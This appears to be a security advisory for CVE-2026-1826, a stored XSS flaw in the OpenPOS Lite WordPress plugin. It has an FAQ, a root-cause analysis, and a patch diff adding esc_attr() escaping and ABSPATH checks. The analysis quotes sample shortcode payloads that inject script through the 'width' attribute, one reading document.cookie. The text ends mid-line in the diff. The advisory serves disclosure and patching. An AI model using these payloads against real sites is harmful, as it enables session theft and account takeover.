What is CVE-2026-1826?

CVE-2026-1826 is a stored cross-site scripting (XSS) vulnerability in the OpenPOS Lite plugin for WordPress. It allows authenticated attackers with Contributor-level access and above to inject malicious scripts via the ‘width’ parameter of the order_qrcode shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the shortcode rendering functions. Attackers can embed malicious JavaScript in the ‘width’ or ‘height’ attributes of the shortcode, which executes when users view the affected page.

Who is affected by this vulnerability?

Any WordPress site using OpenPOS Lite version 3.0 or earlier is susceptible to this vulnerability. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the OpenPOS Lite plugin installed. If it is version 3.0 or earlier, your site is at risk and should be updated immediately.

How can I fix CVE-2026-1826?

To fix CVE-2026-1826, update the OpenPOS Lite plugin to version 3.1 or later, where the vulnerability has been patched. Ensure that all instances of the plugin are updated across your WordPress installations.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks such as session hijacking or content manipulation.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the context of authenticated users. This could lead to session hijacking, administrative account takeover, or defacement of site content.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an authenticated user can create a post containing a malicious shortcode. When the post is viewed, the injected JavaScript executes, showcasing the stored XSS vulnerability.

What are the key changes in the patched version?

In version 3.1, the plugin was updated to include proper sanitization of the ‘width’ and ‘height’ attributes using the esc_attr() function. This prevents script injection by encoding special HTML characters.

What additional security measures should I take?

In addition to updating the plugin, consider implementing security best practices such as using a web application firewall, regularly scanning for vulnerabilities, and limiting user permissions to reduce the risk of exploitation.

How can I stay informed about vulnerabilities like this?

To stay informed, follow reputable security blogs, subscribe to WordPress security mailing lists, and monitor the official WordPress plugin repository for updates and security advisories.

Is there any way to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the OpenPOS Lite plugin until a patch can be applied. Additionally, review user roles and limit access to trusted users only.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1826: OpenPOS Lite <= 3.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (wpos-lite-version)

CVE ID CVE-2026-1826

Plugin wpos-lite-version

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.0

Patched Version 3.1

Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1826:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the OpenPOS Lite WordPress plugin. The vulnerability affects the ‘order_qrcode’ shortcode handler and allows Contributor-level authenticated attackers to inject malicious scripts that execute when users view pages containing the compromised shortcode. The CVSS score of 6.4 reflects the medium severity of this stored XSS requiring authenticated access.

The root cause is insufficient output escaping in the shortcode rendering functions within the Admin.php file. Specifically, the functions _order_qrcode_func (line 3158), _order_barcode_func (line 3185), _barcode_img_func (line 3244), and the QR code generation section (line 3265) directly concatenate user-controlled ‘width’ and ‘height’ shortcode attribute values into HTML style attributes without proper sanitization. These functions receive shortcode attributes via the $atts parameter array, which contains user-supplied values from WordPress shortcode parsing.

Exploitation requires an authenticated attacker with Contributor privileges or higher to create or edit posts containing the vulnerable shortcode. The attacker would embed a malicious payload in the ‘width’ or ‘height’ attributes of the [order_qrcode] shortcode, such as [order_qrcode width=”100px;background:url(javascript:alert(document.cookie))”] or [order_qrcode width=”100″ onload=”alert(‘XSS’)”]. When WordPress renders the page containing this shortcode, the plugin processes the attributes and injects the unescaped values directly into the HTML output style attribute, enabling script execution in victims’ browsers.

The patch addresses the vulnerability by adding esc_attr() function calls to sanitize the ‘width’ and ‘height’ attribute values before output. In the patched version, lines 3158, 3185, 3244, and 3265 now wrap $atts[‘width’] and $atts[‘height’] with esc_attr(), which encodes special HTML characters and prevents script injection. The patch also includes security hardening changes like adding ABSPATH checks to prevent direct file access and renaming JavaScript/CSS files to avoid conflicts, though these changes don’t directly fix the XSS vulnerability.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users viewing compromised pages. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Since the XSS is stored, the payload persists and executes for all users who view the affected page, potentially affecting administrators and other high-privilege users.

Differential between vulnerable and patched code

Code Diff

--- a/wpos-lite-version/includes/Setting.php
+++ b/wpos-lite-version/includes/Setting.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php
 if(!class_exists('Openpos_Setting'))
 {
     class Openpos_Setting
--- a/wpos-lite-version/includes/admin/Admin.php
+++ b/wpos-lite-version/includes/admin/Admin.php
@@ -2768,8 +2768,8 @@


     public function admin_receipt_enqueue(){
-        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/codemirror.js',array('jquery'));
-        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/codemirror.css' );
+        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/op_codemirror.js',array('jquery'));
+        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/op_codemirror.css' );
         $this->admin_style();


@@ -2778,8 +2778,8 @@
     public function admin_enqueue_setting() {
         global $OPENPOS_SETTING;
         $OPENPOS_SETTING->admin_enqueue_scripts();
-        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/codemirror.js',array('jquery'));
-        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/codemirror.css' );
+        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/op_codemirror.js',array('jquery'));
+        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/op_codemirror.css' );
         $this->admin_style();

     }
@@ -3158,7 +3158,7 @@
         }
         //$img_src = esc_url('https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl='.$barcode.'&choe=UTF-8');
         $img_src = $this->core->generateQRcode($barcode,$atts['width'],$atts['height']);
-        return '<img src="'.$img_src.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+        return '<img src="'.$img_src.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

     }
     public function _order_barcode_func($atts)
@@ -3185,7 +3185,7 @@
         $barcode_height = isset($atts['height']) ? $atts['height'] : null ;

         $img_data = $this->core->generateBarcode($barcode, $barcode_mode,$barcode_width,$barcode_height);
-        return '<img src="'.$img_data.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+        return '<img src="'.$img_data.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';
     }
     public function _barcode_img_func($atts)
     {
@@ -3244,7 +3244,7 @@
                 }

                 $img_data = $this->core->generateBarcode($barcode, $barcode_mode,$barcode_w,$barcode_h);
-                return '<img src="'.$img_data.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+                return '<img src="'.$img_data.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

             }else{
                 $chs = '100x100';
@@ -3265,7 +3265,7 @@
                 $img_url = $this->core->generateQRcode($barcode,$barcode_w,$barcode_h);


-                return '<img src="'.$img_url.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+                return '<img src="'.$img_url.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

             }
         }
--- a/wpos-lite-version/includes/api/Api.php
+++ b/wpos-lite-version/includes/api/Api.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API'))
 {
     class OP_REST_API extends WC_REST_CRUD_Controller{
@@ -95,6 +96,8 @@
                 }
                 if($session_data)
                 {
+                    global $op_session_data;
+                    $op_session_data = $session_data;
                     $this->session_data = $session_data;
                     return true;
                 }
--- a/wpos-lite-version/includes/api/Auth.php
+++ b/wpos-lite-version/includes/api/Auth.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Auth'))
 {
     class OP_REST_API_Auth extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Cart.php
+++ b/wpos-lite-version/includes/api/Cart.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Cart'))
 {
     class OP_REST_API_Cart extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Customer.php
+++ b/wpos-lite-version/includes/api/Customer.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Customer'))
 {
     class OP_REST_API_Customer extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Extension.php
+++ b/wpos-lite-version/includes/api/Extension.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Extension'))
 {
     class OP_REST_API_Extension extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Order.php
+++ b/wpos-lite-version/includes/api/Order.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Order'))
 {
     class OP_REST_API_Order extends OP_REST_API{
@@ -487,6 +488,7 @@
         private function _add_order($order_data,$order_source,$is_clear = true){
             $result = array('status' => 0,'data' => array(),'message' => '');
             try{
+                global $_op_warehouse_id;
                 $use_hpos = $this->core_class->enable_hpos();
                 $session_data = $this->session_data;
                 $_op_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
@@ -665,6 +667,7 @@
             try{
                 $use_hpos = $this->core_class->enable_hpos();
                 $session_data = $this->session_data;
+                global $_op_warehouse_id;
                 $_op_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
                 $order_data_json = $request->get_param('order');//stripslashes($_REQUEST['order']);
                 $order_data = json_decode($order_data_json,true);
@@ -1544,6 +1547,7 @@
                 'api_message' => ''
             );
             try{
+                global $_op_warehouse_id;
                 $session_data = $this->session_data;
                 $use_hpos = $this->core_class->enable_hpos();
                 $login_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
@@ -1681,6 +1685,7 @@
                 'api_message' => ''
             );
             try{
+                global $_op_warehouse_id;
                 $session_data = $this->session_data;
                 $login_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
                 $_op_warehouse_id = $login_warehouse_id;
--- a/wpos-lite-version/includes/api/Product.php
+++ b/wpos-lite-version/includes/api/Product.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Product'))
 {
     class OP_REST_API_Product extends OP_REST_API{
@@ -245,6 +246,10 @@
                 $local_db_version = $request->get_param( 'local_db_version' ) ? $request->get_param( 'local_db_version' ) : 0;
                 $online_db_version = $request->get_param( 'online_db_version' ) ? $request->get_param( 'online_db_version' ) : 0;
                 $page = $request->get_param( 'page' ) ? $request->get_param( 'page' ) : 1;
+                if(!$page || !is_numeric($page))
+                {
+                    $page = 1;
+                }
                 $database_version = get_option('_openpos_product_version_'.$login_warehouse_id,0);
                 if($local_db_version > 0)
                 {
--- a/wpos-lite-version/includes/api/Table.php
+++ b/wpos-lite-version/includes/api/Table.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Table'))
 {
     class OP_REST_API_Table extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Transaction.php
+++ b/wpos-lite-version/includes/api/Transaction.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Transaction'))
 {
     class OP_REST_API_Transaction extends OP_REST_API{
--- a/wpos-lite-version/index.php
+++ b/wpos-lite-version/index.php
@@ -5,13 +5,13 @@
 Description: Quick POS system for woocommerce. This is Lite Version of OpenPOS
 Author: anhvnit@gmail.com
 Author URI: http://openswatch.com/
-Version: 3.0
+Version: 3.1
 WC requires at least: 2.6
-WC tested up to: 4.8.0
+WC tested up to: 10.5.0
 Text Domain: wpos-lite
 License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
 */
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 define('WPOSL_DIR',plugin_dir_path(__FILE__));
 define('WPOSL_URL',plugins_url('wpos-lite-version'));

--- a/wpos-lite-version/lib/abtract-op-app.php
+++ b/wpos-lite-version/lib/abtract-op-app.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/class-op-addon.php
+++ b/wpos-lite-version/lib/class-op-addon.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 //install_plugins_tabs
 if(!class_exists('OP_Addon'))
 {
--- a/wpos-lite-version/lib/class-op-exchange.php
+++ b/wpos-lite-version/lib/class-op-exchange.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Exchange'))
 {
     class OP_Exchange{
--- a/wpos-lite-version/lib/class-op-integration.php
+++ b/wpos-lite-version/lib/class-op-integration.php
@@ -5,6 +5,7 @@
  * Date: 9/18/18
  * Time: 17:17
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Integration'))
 {
     class OP_Integration{
--- a/wpos-lite-version/lib/class-op-receipt.php
+++ b/wpos-lite-version/lib/class-op-receipt.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Receipt'))
 {
     class OP_Receipt{
--- a/wpos-lite-version/lib/class-op-register.php
+++ b/wpos-lite-version/lib/class-op-register.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Register'))
 {
     class OP_Register{
--- a/wpos-lite-version/lib/class-op-report.php
+++ b/wpos-lite-version/lib/class-op-report.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Report'))
 {
     class OP_Report{
--- a/wpos-lite-version/lib/class-op-stock.php
+++ b/wpos-lite-version/lib/class-op-stock.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Stock'))
 {
     class OP_Stock{
--- a/wpos-lite-version/lib/class-op-supplier.php
+++ b/wpos-lite-version/lib/class-op-supplier.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Supplier'))
 {
     class OP_Supplier{
--- a/wpos-lite-version/lib/class-op-table.php
+++ b/wpos-lite-version/lib/class-op-table.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Table'))
 {
     class OP_Table{
--- a/wpos-lite-version/lib/class-op-transaction.php
+++ b/wpos-lite-version/lib/class-op-transaction.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Transaction'))
 {
     class OP_Transaction{
--- a/wpos-lite-version/lib/class-op-warehouse.php
+++ b/wpos-lite-version/lib/class-op-warehouse.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Warehouse'))
 {
     class OP_Warehouse{
--- a/wpos-lite-version/lib/class-op-woo-cart.php
+++ b/wpos-lite-version/lib/class-op-woo-cart.php
@@ -5,6 +5,7 @@
  * Date: 4/10/19
  * Time: 13:33
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Woo_Cart'))
 {
     class OP_Woo_Cart{
--- a/wpos-lite-version/lib/class-op-woo-order.php
+++ b/wpos-lite-version/lib/class-op-woo-order.php
@@ -6,6 +6,7 @@
  * Time: 13:33
  */
 use AutomatticWooCommerceInternalDataStoresOrdersOrdersTableDataStore;
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Woo_Order'))
 {
     class OP_Woo_Order{
--- a/wpos-lite-version/lib/class-op-woo.php
+++ b/wpos-lite-version/lib/class-op-woo.php
@@ -6,6 +6,7 @@
  * Time: 21:54
  */
 use AutomatticWooCommerceUtilitiesOrderUtil;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class OP_Woo{
     private $settings_api;
     private $_core;
--- a/wpos-lite-version/lib/class-tgm-plugin-activation.php
+++ b/wpos-lite-version/lib/class-tgm-plugin-activation.php
@@ -31,7 +31,7 @@
 	along with this program; if not, write to the Free Software
 	Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 if ( ! class_exists( 'TGMOP_Plugin_Activation' ) ) {

 	/**
--- a/wpos-lite-version/lib/integration/grconnect.php
+++ b/wpos-lite-version/lib/integration/grconnect.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/integration/woocommerce-product-addons.php
+++ b/wpos-lite-version/lib/integration/woocommerce-product-addons.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/integration/woocommerce-product-bundles.php
+++ b/wpos-lite-version/lib/integration/woocommerce-product-bundles.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/interface-op-app.php
+++ b/wpos-lite-version/lib/interface-op-app.php
@@ -5,6 +5,7 @@
  * Date: 3/19/19
  * Time: 23:36
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 Interface OP_App {

     public function get_key();
--- a/wpos-lite-version/lib/op-payment.php
+++ b/wpos-lite-version/lib/op-payment.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 function wc_openpos_offline_add_to_gateways( $gateways ) {
 	if(class_exists('WC_Payment_Gateway'))
 	{
--- a/wpos-lite-version/src/Models/Customer.php
+++ b/wpos-lite-version/src/Models/Customer.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Customer {
     public $id;
     public $avatar;
--- a/wpos-lite-version/src/Models/Order.php
+++ b/wpos-lite-version/src/Models/Order.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Order {
     public $id;
     public $session;
--- a/wpos-lite-version/src/Models/Outlet.php
+++ b/wpos-lite-version/src/Models/Outlet.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Outlet{
     public function __construct()
     {
--- a/wpos-lite-version/src/Models/Product.php
+++ b/wpos-lite-version/src/Models/Product.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Product {
     public $id;
     public $item_parent_id;
--- a/wpos-lite-version/src/Models/Register.php
+++ b/wpos-lite-version/src/Models/Register.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Register{
     public $_base_path;
     public $_post_type = '_op_register';
--- a/wpos-lite-version/src/Models/Session.php
+++ b/wpos-lite-version/src/Models/Session.php
@@ -2,7 +2,7 @@
 namespace OpModels;

 use WP_Filesystem_Direct;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Session{
     public $_base_path;
     public $_session_path;
--- a/wpos-lite-version/src/Models/Table.php
+++ b/wpos-lite-version/src/Models/Table.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Table{
     public function __construct()
     {
--- a/wpos-lite-version/src/Models/User.php
+++ b/wpos-lite-version/src/Models/User.php
@@ -2,7 +2,7 @@
 namespace OpModels;

 use WP_Error;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class User{
     public function __construct()
     {
--- a/wpos-lite-version/templates/admin/receipt_template_composer.php
+++ b/wpos-lite-version/templates/admin/receipt_template_composer.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php

 $op_nonce = wp_create_nonce( 'op_nonce' );
 ?>
--- a/wpos-lite-version/templates/admin/report/report_form.php
+++ b/wpos-lite-version/templates/admin/report/report_form.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php
 $op_nonce = wp_create_nonce( 'op_nonce' );
 $payment_methods = array();
 $payment_methods[] = array(
--- a/wpos-lite-version/templates/admin/report/report_sales_chart.php
+++ b/wpos-lite-version/templates/admin/report/report_sales_chart.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid op-main-content" style="margin-bottom: 5px;">
     <div class="row" id="summary-list">
         <div class="col-md-3 col-log-3 col-sm-3 col-xs-3">
--- a/wpos-lite-version/templates/admin/report/report_sales_table.php
+++ b/wpos-lite-version/templates/admin/report/report_sales_table.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid op-main-content">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/report/report_transactions_chart.php
+++ b/wpos-lite-version/templates/admin/report/report_transactions_chart.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/report/report_transactions_table.php
+++ b/wpos-lite-version/templates/admin/report/report_transactions_table.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/woocommerce/order_exchanges.php
+++ b/wpos-lite-version/templates/admin/woocommerce/order_exchanges.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <?php foreach($exchanges as $exchange):  ?>
 <tr>
     <td><img style="max-width: 19.5px;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGAAAABiCAYAAACvUNYzAAADD0lEQVR4Xu3dMXbUMBAG4JEaSlpKjmCs3Z4bEG4QOo7BMejIDQg3oN9ns0egpE2ZxuKZ7L44u3ayNpY0/8xsG60t/58l5T2PvI4Sf7bbbdV13a33/mq32+0Tnw7u8C5ljw/h/ySi10R0571/bwhPE08KEEK4IqLvg1MawskdnxSgP1dd19fOuW+GMD7XJAcwhOcn+SwAhjCNkA3AEApOQcNT25qQ8b+gqYFnCI/JZJ2CbCSc35LFAGxNeMAoCmAIDAC0IxQfAcdZUevCzAZA60hgBaARgR2ANgSWAJoQ2AJoQWANoAGBPYB0BAgAyQgwAFIRoAAkIsABSEOABJCEAAsgBQEaQAICPAA6gggAZAS32Wy+TJcNYf0lxlgR0YdBr+9jjDdt237meiUuhBC5dm6tfnnv33GtylYBQEQfm6a5XQt0zeOImoK6rnvjnLsmoleDkH40TdOXyV/8ybmpRMwifLIZ5F/YMcZPbdveXJw8EeXeVCICIFH4R7ek0xc8QMrwl4ygOaOtbwsNgB4+NICE8GEBpIQPCSApfDgAaeFDAUgMHwZAavgQAJLDZw8gPXzWABrCZwugJXyWAJrCZwegLXxWABrDZwOgNXwWAJrDLw6gPfyiABb+w7OzIk/ELPzHB5fZASz8p0+NswJY+OeP7LMBWPjj9RJZACz86WKV5AAW/vOVQkkBLPyXy7SSApy+O3pJpdlaiC9HUaZFUoD+ko5vwloSfl3XX8eqnZ1zYl6DnxygR6iq6u1+v/895x473Pm/5nwHsW0WgCXBjLz6fslh2H+HLUCfXAih39VytufLe/+HfbIXdpA1wHANGVyPqB+BYA8gHQECQDICDIBUBCgAiQhwANIQIAEkIcACSEGABpCAAA+AjiACABlBDAAqgigARARxAGgIIgGQEMQCoCCIBkBAEA/AHUEFAGcENQBcEVQBcERQB8ANQSUAJwS1AFwQVANwQFAPUBrBAA4ld6V+z9gABjWPJRAM4KSIdgTB3h19YaHxas3+Z1PJ3E7YCJhIbMmmkrnh9+3/ApVRKwcNOc/dAAAAAElFTkSuQmCC" /></td>
--- a/wpos-lite-version/templates/emails/op-customer-receipt.php
+++ b/wpos-lite-version/templates/emails/op-customer-receipt.php
@@ -1,3 +1,4 @@
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/emails/plain/op-customer-receipt.php
+++ b/wpos-lite-version/templates/emails/plain/op-customer-receipt.php
@@ -1,3 +1,4 @@
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/emails/receipt.php
+++ b/wpos-lite-version/templates/emails/receipt.php
@@ -1,7 +1,4 @@
-<?php
-   //$json = '{"id":1585542623171,"session":"op-1585377232-5c346840b58849bd06d9eb9a7b5fbaa5","order_number":518,"order_number_format":"#518","title":"","items":[{"id":1585542660560,"name":"ACME","barcode":"00000002272","sub_name":"","dining":"","price":16.53,"price_incl_tax":20,"product_id":2272,"final_price":16.53,"final_price_incl_tax":20,"final_price_source":"","options":[],"bundles":[],"variations":[],"rule_discount":{},"discount_source":"","discount_amount":0,"discount_type":"fixed","final_discount_amount":0,"final_discount_amount_incl_tax":0,"qty":1,"refund_qty":0,"exchange_qty":0,"refund_total":0,"tax_amount":0,"total_tax":3.47,"total":16.53,"total_incl_tax":20,"product":{"name":"ACME","id":2272,"parent_id":2272,"sku":"","qty":null,"manage_stock":false,"stock_status":"instock","barcode":"00000002272","image":"http://localhost.com/dev/openpos/wordpress/wp-content/uploads/2019/03/product-1552879577-436784698.png","price":16.53,"price_incl_tax":20,"final_price":16.53,"special_price":"","regular_price":20,"sale_from":null,"sale_to":null,"status":"publish","categories":[],"tax":[{"code":"standard_1","rate":21,"shipping":"yes","compound":"no","rate_id":1,"label":"Tax","total":3.47}],"tax_amount":3.47,"price_included_tax":1,"group_items":[],"variations":[],"options":[],"bundles":[],"display_special_price":false,"allow_change_price":true,"price_display_html":"<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">$</span>20,00</span>","display":true,"str_key":"ACME"},"option_pass":true,"option_total":0,"bundle_total":0,"note":"","parent_id":0,"seller_id":0,"seller_name":"","item_type":"","has_custom_discount":false,"disable_qty_change":false,"read_only":false,"promotion_added":0,"tax_details":[{"code":"standard_1","compound":"no","label":"Tax","rate":21,"rate_id":1,"shipping":"yes","total":3.47}],"custom_fields":[],"is_exchange":false,"update_time":1585542660560}],"sub_total":16.53,"sub_total_incl_tax":20,"tax_amount":3.47,"customer":{"id":0,"group_id":0,"name":"","email":"","address":"","phone":"","point":0,"point_rate":0,"discount":0,"addition_data":{},"shipping_address":[]},"cart_rule_discount":{},"discount_source":"","discount_amount":0,"discount_final_amount":0,"discount_type":"","final_items_discount_amount":0,"final_discount_amount":0,"discount_tax_amount":0,"discount_excl_tax":0,"grand_total":20,"total_paid":0,"discount_code":"","discount_codes":[],"discount_code_amount":0,"discount_code_tax_amount":0,"discount_code_excl_tax":0,"payment_method":[{"name":"Cash","code":"cash","ref":"","description":"","paid":20,"return":0,"paid_point":0,"type":"offline","online_type":"","partial":false,"status_url":"","offline_transaction":"yes","offline_order":"yes"}],"shipping_information":{"shipping_method":"","shipping_title":"","address_id":0,"name":"","email":"","address":"","phone":"","note":"","shipping_method_details":{},"tax_details":[]},"shipping_cost":0,"shipping_tax":0,"shipping_tax_details":[],"sale_person":1,"sale_person_name":"admin","note":"","pickup_time":"","created_at":"3/30/2020, 11:31:11 